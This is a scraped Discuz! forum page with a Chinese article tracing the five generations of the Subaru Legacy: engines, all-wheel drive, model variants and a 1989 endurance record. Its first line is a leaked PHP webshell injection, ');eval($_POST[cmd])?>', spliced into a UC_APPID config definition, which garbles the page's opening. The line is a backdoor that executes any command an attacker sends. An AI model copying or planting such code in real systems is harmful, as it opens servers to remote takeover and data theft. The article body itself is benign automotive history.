');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 斯巴魯 5代車歷史解密 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

斯巴魯 5代車歷史解密

提到斯巴魯不得不提到左右對稱全時四輪驅動系統與水平對置發動機,也自然想到了翼豹、力獅、森林人這些耳熟能詳的車型。走過20年的斯巴魯在汽車領域留下了讓人印象深刻的經典作品,而作為主打車型的力獅完全見證了斯巴魯的整個歷史。隨著全新第五代力獅的上市,斯巴魯又將引來更多矚目的眼光。下面我們就一揭解開力獅五代車型的歷史面紗。

  第一代:1989-1993年



  1989年誕生的首代Legacy力獅是斯巴魯集合以往技術精粹和設計經驗而成,它通過左右對稱全時四輪驅動系統(Symmetrical AWD)與全新設計的EJ型水平對置發動機(SUBARU BOXER)的完美結合,實現了斯巴魯追求最佳行駛性能的汽車設計思路。力獅GT、力獅RS等是第一代力獅的代表車型。













  發佈之前,斯巴魯使用三輛力獅在美國亞利桑那測試中心向10萬公里不間斷行駛世界速度紀錄發起了挑戰。最終3 輛測試車都行駛完全程,並以平均速度223.345km/h創造了10萬公里連續行駛世界紀錄,這一紀錄保持了16 年之久。

  1992年力獅GT typeS2

  第二代:1993-1998年

  93年推出的二代(BD/BG型)斯巴魯力獅又讓車系甚至整個斯巴魯品牌更為擴展。這個時候房車車型叫Legacy Touring Sport、五門旅行車Legacy Touring Wagon的稱呼已逐漸定型,車系陣容也更為豐富,引擎從1.8L到2.5L渦輪等共五種排氣量版本,也有稀薄燃燒引擎。其中最大話題就是採用序列式雙渦輪機構。96年小改款的時候,2.0L引擎達到280匹馬力,是世界量產車中首次達到這個水準。




  在車系內眾多車型之中,特別值得注意的是95年的Legacy Grand Wagon,它是以250T為基礎的高車身版,具有SUV風格外觀,稱得上是跨界車種的老前輩,在北美市場則以Outback之名販售。

  第三代:1998-2003年

  到了三代車型,力獅全車系取消FF設定,全面改為四驅化;1.8L引擎被揚棄,入門門檻向更上級排氣量推移。四門房車型也在此時被賦予Legacy B4之名,五門旅行車等於成為斯巴魯力獅的代表象征,事實上在三代車型推出時就是先推Legacy Wagon與Legacy Lanc aster,過了半年之後才追加Legacy B4四門房車。

  2000年時,搭載新開發六缸水平對臥引擎的Legacy Lanc aster 6上市,後來陸續搭載於02年的Legacy Touring與Legacy B4之上。1999年的Legacy Lanc aster ADA配備採用CCD攝影機的ADA駕駛輔助系統,在科技上也很趕得上流行。




  為了滿足性能及改裝車迷的需求,三代力獅也推出了E-Tune、S-Tune與STI自行改裝的Legacy S401等限量車型,都成為車迷間討論的話題。

  第四代:2003-2009年




  03年改款的四代斯巴魯力獅車型,已經從日本法規的五號車牌改為三號車牌,這樣的轉變是出於提升車格、設計上的平衡與提高撞擊安全性等考量。另外,斯巴魯力獅的看板象徵2.0渦輪引擎,也從原本的2 stage式雙渦輪改為採用雙渦流機構單渦輪設計;排氣歧管改為等長設計提升排氣效率,雖然這種設計會讓斯巴魯水平對臥引擎特有的排氣聲浪消失,但卻對動力輸出的提升有很大助益。

  另一個四代力獅的特徵,就是「SI-Drive」系統,該系統提供三種模式,駕駛者只要在這三種模式中切換,就可以改變動力輸出的特性,想要經濟省油或是激烈操駕都任君選擇。引擎除了2.0L、2.5L自然進氣、2.5L渦輪外還加入了3.0L引擎,而針對歐洲市場更在2008年追加水平對臥柴油引擎車型。







第五代斯巴魯力獅

  歷經了二十年的進化與改良,斯巴魯力獅在進入五代大改款之前就是一款非常成熟的車型。不過,到達一個目標的瞬間,又是向下一個境界挑戰的開始。運動車廠的斯巴魯或許是個小眾人擁護的廠商,但我們依然希望汽車界能有這樣的廠商來給我們帶來驚喜。
返回列表